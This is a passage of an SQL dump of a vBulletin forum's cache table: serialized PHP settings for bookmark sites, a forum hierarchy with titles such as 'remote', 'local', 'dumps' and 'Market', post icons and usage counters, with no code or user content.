e\";i:1;s:12:\"join_to_view\";i:2;s:21:\"enable_group_messages\";i:4;s:19:\"enable_group_albums\";i:8;s:22:\"only_owner_discussions\";i:16;}s:13:\"prefixoptions\";a:1:{s:15:\"deny_by_default\";i:1;}s:7:\"hvcheck\";a:5:{s:8:\"register\";i:1;s:4:\"post\";i:2;s:6:\"search\";i:4;s:9:\"contactus\";i:8;s:6:\"lostpw\";i:16;}}}', 1),
('bookmarksitecache', 'a:4:{i:1;a:7:{s:14:\"bookmarksiteid\";s:1:\"1\";s:5:\"title\";s:4:\"Digg\";s:8:\"iconpath\";s:21:\"bookmarksite_digg.gif\";s:6:\"active\";s:1:\"1\";s:12:\"displayorder\";s:2:\"10\";s:3:\"url\";s:62:\"http://digg.com/submit?phase=2&url={URL}&title={TITLE}\";s:10:\"utf8encode\";s:1:\"0\";}i:2;a:7:{s:14:\"bookmarksiteid\";s:1:\"2\";s:5:\"title\";s:11:\"del.icio.us\";s:8:\"iconpath\";s:26:\"bookmarksite_delicious.gif\";s:6:\"active\";s:1:\"1\";s:12:\"displayorder\";s:2:\"20\";s:3:\"url\";s:51:\"http://del.icio.us/post?url={URL}&title={TITLE}\";s:10:\"utf8encode\";s:1:\"0\";}i:3;a:7:{s:14:\"bookmarksiteid\";s:1:\"3\";s:5:\"title\";s:11:\"StumbleUpon\";s:8:\"iconpath\";s:28:\"bookmarksite_stumbleupon.gif\";s:6:\"active\";s:1:\"1\";s:12:\"displayorder\";s:2:\"30\";s:3:\"url\";s:61:\"http://www.stumbleupon.com/submit?url={URL}&title={TITLE}\";s:10:\"utf8encode\";s:1:\"0\";}i:4;a:7:{s:14:\"bookmarksiteid\";s:1:\"4\";s:5:\"title\";s:6:\"Google\";s:8:\"iconpath\";s:23:\"bookmarksite_google.gif\";s:6:\"active\";s:1:\"1\";s:12:\"displayorder\";s:2:\"40\";s:3:\"url\";s:94:\"http://www.google.com/bookmarks/mark?op=edit&output=popup&bkmk={URL}&title={TITLE}\";s:10:\"utf8encode\";s:1:\"0\";}}', 1),
('cron', '1465232700', 0),
('eventcache', 'a:1:{s:4:\"date\";s:9:\"8-14-2016\";}', 1),
('forumcache', 'a:22:{i:1;a:24:{s:7:\"forumid\";i:1;s:7:\"styleid\";i:0;s:5:\"title\";s:7:\"invites\";s:11:\"title_clean\";s:7:\"invites\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:86017;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:1;s:10:\"lastpostid\";i:0;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:-1;s:10:\"parentlist\";s:4:\"1,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:8:\"1,2,4,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:0;s:11:\"permissions\";a:8:{i:4;i:0;i:6;i:0;i:8;i:0;i:7;i:0;i:2;i:0;i:5;i:0;i:1;i:0;i:3;i:0;}}i:2;a:24:{s:7:\"forumid\";i:2;s:7:\"styleid\";i:0;s:5:\"title\";s:3:\"new\";s:11:\"title_clean\";s:3:\"new\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:89799;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:2;s:10:\"lastpostid\";i:2862;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:1;s:10:\"parentlist\";s:6:\"2,1,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:4:\"2,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:0;i:6;i:0;i:8;i:0;i:7;i:0;i:2;i:0;i:5;i:0;i:1;i:0;i:3;i:0;}}i:4;a:24:{s:7:\"forumid\";i:4;s:7:\"styleid\";i:0;s:5:\"title\";s:9:\"activated\";s:11:\"title_clean\";s:9:\"activated\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:97991;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:3;s:10:\"lastpostid\";i:2285;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:1;s:10:\"parentlist\";s:6:\"4,1,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:4:\"4,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:0;i:6;i:0;i:8;i:0;i:7;i:0;i:2;i:0;i:5;i:0;i:1;i:0;i:3;i:0;}}i:11;a:24:{s:7:\"forumid\";i:11;s:7:\"styleid\";i:0;s:5:\"title\";s:7:\"project\";s:11:\"title_clean\";s:7:\"project\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:86017;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:2;s:10:\"lastpostid\";i:0;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:-1;s:10:\"parentlist\";s:5:\"11,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:8:\"11,13,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:0;s:11:\"permissions\";a:8:{i:4;i:0;i:6;i:0;i:8;i:0;i:7;i:0;i:2;i:0;i:5;i:0;i:1;i:0;i:3;i:0;}}i:13;a:24:{s:7:\"forumid\";i:13;s:7:\"styleid\";i:0;s:5:\"title\";s:4:\"news\";s:11:\"title_clean\";s:4:\"news\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:97991;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:13;s:10:\"lastpostid\";i:2931;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:11;s:10:\"parentlist\";s:8:\"13,11,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:5:\"13,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:0;i:6;i:16777215;i:8;i:0;i:7;i:0;i:2;i:16777215;i:5;i:0;i:1;i:0;i:3;i:0;}}i:6;a:24:{s:7:\"forumid\";i:6;s:7:\"styleid\";i:0;s:5:\"title\";s:8:\"security\";s:11:\"title_clean\";s:8:\"security\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:97987;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:4;s:10:\"lastpostid\";i:1014;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:-1;s:10:\"parentlist\";s:4:\"6,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:11:\"6,7,9,10,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:0;s:11:\"permissions\";a:8:{i:4;i:0;i:6;i:16777215;i:8;i:0;i:7;i:16777215;i:2;i:0;i:5;i:0;i:1;i:0;i:3;i:0;}}i:7;a:24:{s:7:\"forumid\";i:7;s:7:\"styleid\";i:0;s:5:\"title\";s:6:\"remote\";s:11:\"title_clean\";s:6:\"remote\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:97991;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:5;s:10:\"lastpostid\";i:2990;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:6;s:10:\"parentlist\";s:6:\"7,6,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:4:\"7,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:0;i:6;i:16777215;i:8;i:0;i:7;i:16777215;i:2;i:16777215;i:5;i:16777215;i:1;i:0;i:3;i:0;}}i:9;a:24:{s:7:\"forumid\";i:9;s:7:\"styleid\";i:0;s:5:\"title\";s:5:\"local\";s:11:\"title_clean\";s:5:\"local\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:97991;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:6;s:10:\"lastpostid\";i:2210;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:6;s:10:\"parentlist\";s:6:\"9,6,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:4:\"9,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:0;i:6;i:16777215;i:8;i:0;i:7;i:16777215;i:2;i:0;i:5;i:0;i:1;i:0;i:3;i:0;}}i:10;a:24:{s:7:\"forumid\";i:10;s:7:\"styleid\";i:0;s:5:\"title\";s:5:\"dumps\";s:11:\"title_clean\";s:5:\"dumps\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:97991;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:7;s:10:\"lastpostid\";i:2932;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:6;s:10:\"parentlist\";s:7:\"10,6,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:5:\"10,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:0;i:6;i:16777215;i:8;i:0;i:7;i:16777215;i:2;i:0;i:5;i:0;i:1;i:0;i:3;i:0;}}i:14;a:24:{s:7:\"forumid\";i:14;s:7:\"styleid\";i:0;s:5:\"title\";s:6:\"coding\";s:11:\"title_clean\";s:6:\"coding\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:86017;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:8;s:10:\"lastpostid\";i:0;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:-1;s:10:\"parentlist\";s:5:\"14,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:11:\"14,16,15,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:0;s:11:\"permissions\";a:8:{i:4;i:0;i:6;i:16777215;i:8;i:0;i:7;i:16777215;i:2;i:16777215;i:5;i:16777215;i:1;i:0;i:3;i:0;}}i:16;a:24:{s:7:\"forumid\";i:16;s:7:\"styleid\";i:0;s:5:\"title\";s:7:\"develop\";s:11:\"title_clean\";s:7:\"develop\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:97991;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:9;s:10:\"lastpostid\";i:2979;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:14;s:10:\"parentlist\";s:8:\"16,14,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:5:\"16,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:0;i:6;i:16777215;i:8;i:0;i:7;i:16777215;i:2;i:16777215;i:5;i:16777215;i:1;i:0;i:3;i:0;}}i:15;a:24:{s:7:\"forumid\";i:15;s:7:\"styleid\";i:0;s:5:\"title\";s:6:\"source\";s:11:\"title_clean\";s:6:\"source\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:97991;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:10;s:10:\"lastpostid\";i:3006;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:14;s:10:\"parentlist\";s:8:\"15,14,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:5:\"15,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:0;i:6;i:16777215;i:8;i:0;i:7;i:16777215;i:2;i:16777215;i:5;i:16777215;i:1;i:0;i:3;i:0;}}i:31;a:24:{s:7:\"forumid\";i:31;s:7:\"styleid\";i:0;s:5:\"title\";s:6:\"Market\";s:11:\"title_clean\";s:6:\"Market\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:98043;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:9;s:10:\"lastpostid\";i:0;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:-1;s:10:\"parentlist\";s:5:\"31,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:23:\"31,32,35,36,39,37,38,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:4:\"w0rm\";s:7:\"podcast\";i:0;s:5:\"depth\";i:0;s:11:\"permissions\";a:8:{i:4;i:655375;i:6;i:16777215;i:8;i:0;i:7;i:12317183;i:2;i:12317183;i:5;i:16777215;i:1;i:655375;i:3;i:655375;}}i:32;a:24:{s:7:\"forumid\";i:32;s:7:\"styleid\";i:0;s:5:\"title\";s:8:\"services\";s:11:\"title_clean\";s:8:\"services\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:98047;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:1;s:10:\"lastpostid\";i:2959;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:31;s:10:\"parentlist\";s:8:\"32,31,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:5:\"32,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:655375;i:6;i:16777215;i:8;i:0;i:7;i:12317183;i:2;i:12317183;i:5;i:16777215;i:1;i:655375;i:3;i:655375;}}i:35;a:24:{s:7:\"forumid\";i:35;s:7:\"styleid\";i:0;s:5:\"title\";s:6:\"remote\";s:11:\"title_clean\";s:6:\"remote\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:98047;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:2;s:10:\"lastpostid\";i:2995;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:31;s:10:\"parentlist\";s:8:\"35,31,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:5:\"35,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:655375;i:6;i:16777215;i:8;i:0;i:7;i:12317183;i:2;i:12317183;i:5;i:16777215;i:1;i:655375;i:3;i:655375;}}i:36;a:24:{s:7:\"forumid\";i:36;s:7:\"styleid\";i:0;s:5:\"title\";s:5:\"local\";s:11:\"title_clean\";s:5:\"local\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:98047;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:3;s:10:\"lastpostid\";i:2798;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:31;s:10:\"parentlist\";s:8:\"36,31,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:5:\"36,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:655375;i:6;i:16777215;i:8;i:0;i:7;i:12317183;i:2;i:12317183;i:5;i:16777215;i:1;i:655375;i:3;i:655375;}}i:39;a:24:{s:7:\"forumid\";i:39;s:7:\"styleid\";i:0;s:5:\"title\";s:6:\"source\";s:11:\"title_clean\";s:6:\"source\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:97991;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:4;s:10:\"lastpostid\";i:2927;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:31;s:10:\"parentlist\";s:8:\"39,31,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:5:\"39,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:655375;i:6;i:16777215;i:8;i:0;i:7;i:12317183;i:2;i:12317183;i:5;i:16777215;i:1;i:655375;i:3;i:655375;}}i:37;a:24:{s:7:\"forumid\";i:37;s:7:\"styleid\";i:0;s:5:\"title\";s:5:\"dumps\";s:11:\"title_clean\";s:5:\"dumps\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:98047;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:5;s:10:\"lastpostid\";i:2988;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:31;s:10:\"parentlist\";s:8:\"37,31,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:5:\"37,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:655375;i:6;i:16777215;i:8;i:0;i:7;i:12317183;i:2;i:12317183;i:5;i:16777215;i:1;i:655375;i:3;i:655375;}}i:38;a:24:{s:7:\"forumid\";i:38;s:7:\"styleid\";i:0;s:5:\"title\";s:5:\"other\";s:11:\"title_clean\";s:5:\"other\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:98047;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:6;s:10:\"lastpostid\";i:3005;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:31;s:10:\"parentlist\";s:8:\"38,31,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:5:\"38,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:655375;i:6;i:16777215;i:8;i:0;i:7;i:12317183;i:2;i:12317183;i:5;i:16777215;i:1;i:655375;i:3;i:655375;}}i:17;a:24:{s:7:\"forumid\";i:17;s:7:\"styleid\";i:0;s:5:\"title\";s:5:\"other\";s:11:\"title_clean\";s:5:\"other\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:86017;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:15;s:10:\"lastpostid\";i:0;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:-1;s:10:\"parentlist\";s:5:\"17,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:11:\"17,24,18,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:0;s:11:\"permissions\";a:8:{i:4;i:655375;i:6;i:16777215;i:8;i:0;i:7;i:12317183;i:2;i:12317183;i:5;i:16777215;i:1;i:0;i:3;i:655375;}}i:24;a:24:{s:7:\"forumid\";i:24;s:7:\"styleid\";i:0;s:5:\"title\";s:10:\"black list\";s:11:\"title_clean\";s:10:\"black list\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:97991;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:1;s:10:\"lastpostid\";i:3004;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:17;s:10:\"parentlist\";s:8:\"24,17,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:5:\"24,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:655375;i:6;i:16777215;i:8;i:0;i:7;i:12317183;i:2;i:12317183;i:5;i:16777215;i:1;i:0;i:3;i:655375;}}i:18;a:24:{s:7:\"forumid\";i:18;s:7:\"styleid\";i:0;s:5:\"title\";s:5:\"flame\";s:11:\"title_clean\";s:5:\"flame\";s:11:\"description\";s:0:\"\";s:17:\"description_clean\";s:0:\"\";s:7:\"options\";i:97991;s:11:\"showprivate\";i:0;s:12:\"displayorder\";i:16;s:10:\"lastpostid\";i:3009;s:9:\"daysprune\";i:-1;s:12:\"newpostemail\";s:0:\"\";s:14:\"newthreademail\";s:0:\"\";s:8:\"parentid\";i:17;s:10:\"parentlist\";s:8:\"18,17,-1\";s:8:\"password\";s:0:\"\";s:4:\"link\";s:0:\"\";s:9:\"childlist\";s:5:\"18,-1\";s:16:\"defaultsortfield\";s:8:\"lastpost\";s:16:\"defaultsortorder\";s:4:\"desc\";s:11:\"imageprefix\";s:0:\"\";s:7:\"podcast\";i:0;s:5:\"depth\";i:1;s:11:\"permissions\";a:8:{i:4;i:655375;i:6;i:16777215;i:8;i:0;i:7;i:12317183;i:2;i:12317183;i:5;i:16777215;i:1;i:0;i:3;i:655375;}}}', 1),
('iconcache', 'a:14:{i:1;a:5:{s:6:\"iconid\";s:1:\"1\";s:5:\"title\";s:4:\"Post\";s:8:\"iconpath\";s:22:\"images/icons/icon1.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}i:13;a:5:{s:6:\"iconid\";s:2:\"13\";s:5:\"title\";s:11:\"Thumbs down\";s:8:\"iconpath\";s:23:\"images/icons/icon13.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}i:12;a:5:{s:6:\"iconid\";s:2:\"12\";s:5:\"title\";s:4:\"Wink\";s:8:\"iconpath\";s:23:\"images/icons/icon12.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}i:11;a:5:{s:6:\"iconid\";s:2:\"11\";s:5:\"title\";s:8:\"Red face\";s:8:\"iconpath\";s:23:\"images/icons/icon11.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}i:10;a:5:{s:6:\"iconid\";s:2:\"10\";s:5:\"title\";s:7:\"Talking\";s:8:\"iconpath\";s:23:\"images/icons/icon10.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}i:9;a:5:{s:6:\"iconid\";s:1:\"9\";s:5:\"title\";s:7:\"Unhappy\";s:8:\"iconpath\";s:22:\"images/icons/icon9.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}i:8;a:5:{s:6:\"iconid\";s:1:\"8\";s:5:\"title\";s:5:\"Angry\";s:8:\"iconpath\";s:22:\"images/icons/icon8.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}i:7;a:5:{s:6:\"iconid\";s:1:\"7\";s:5:\"title\";s:5:\"Smile\";s:8:\"iconpath\";s:22:\"images/icons/icon7.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}i:6;a:5:{s:6:\"iconid\";s:1:\"6\";s:5:\"title\";s:4:\"Cool\";s:8:\"iconpath\";s:22:\"images/icons/icon6.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}i:5;a:5:{s:6:\"iconid\";s:1:\"5\";s:5:\"title\";s:8:\"Question\";s:8:\"iconpath\";s:22:\"images/icons/icon5.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}i:4;a:5:{s:6:\"iconid\";s:1:\"4\";s:5:\"title\";s:11:\"Exclamation\";s:8:\"iconpath\";s:22:\"images/icons/icon4.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}i:3;a:5:{s:6:\"iconid\";s:1:\"3\";s:5:\"title\";s:9:\"Lightbulb\";s:8:\"iconpath\";s:22:\"images/icons/icon3.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}i:2;a:5:{s:6:\"iconid\";s:1:\"2\";s:5:\"title\";s:5:\"Arrow\";s:8:\"iconpath\";s:22:\"images/icons/icon2.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}i:14;a:5:{s:6:\"iconid\";s:2:\"14\";s:5:\"title\";s:9:\"Thumbs up\";s:8:\"iconpath\";s:23:\"images/icons/icon14.gif\";s:15:\"imagecategoryid\";s:1:\"2\";s:12:\"displayorder\";s:1:\"1\";}}', 1),
('languagecache', 'a:1:{i:1;a:3:{s:10:\"languageid\";s:1:\"1\";s:5:\"title\";s:12:\"English (US)\";s:10:\"userselect\";s:1:\"1\";}}', 1),
('loadcache', 'a:2:{s:7:\"loadavg\";s:5:\"0.10,\";s:9:\"lastcheck\";i:1420392566;}', 1),
('mailqueue', '0', 0),
('maxloggedin', 'a:2:{s:9:\"maxonline\";i:1020;s:13:\"maxonlinedate\";i:1440880876;}', 1),
('noticecache', '', 1),
